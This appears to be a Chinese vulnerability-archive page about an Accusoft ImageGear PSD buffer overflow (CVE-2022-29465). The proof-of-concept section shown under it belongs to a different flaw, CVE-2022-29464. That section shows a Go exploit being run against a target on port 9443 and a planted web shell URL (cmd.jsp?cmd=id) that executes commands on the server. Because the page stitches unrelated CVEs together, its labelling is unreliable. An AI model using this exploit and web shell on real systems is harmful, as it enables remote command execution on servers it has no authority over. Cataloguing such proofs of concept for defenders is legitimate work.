CVE-2022-29465 PoC — Accusoft ImageGear 缓冲区错误漏洞
关联漏洞
标题:
Accusoft ImageGear 缓冲区错误漏洞
(CVE-2022-29465)
Description:Accusoft ImageGear是美国Accusoft公司的一款用于图像处理的软件开发工具包(SDK)。 Accusoft ImageGear 20.0 版本存在缓冲区错误漏洞,该漏洞源于PSD Header 处理内存分配功能中存在越界写入漏洞。特制的格式错误的文件可能会导致内存损坏。 攻击者通过该漏洞可以使用恶意文件来触发此漏洞。
Description
CVE-2022-29464
介绍
# CVE-2022-29464
```
#go run main.go
请输入目标地址, 如 https://127.0.0.1
https://127.0.0.1:9443
```
*https://127.0.0.1:9443/authenticationendpoint/cmd.jsp?cmd=id*
文件快照
备注
1. 建议优先通过来源进行访问。
2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →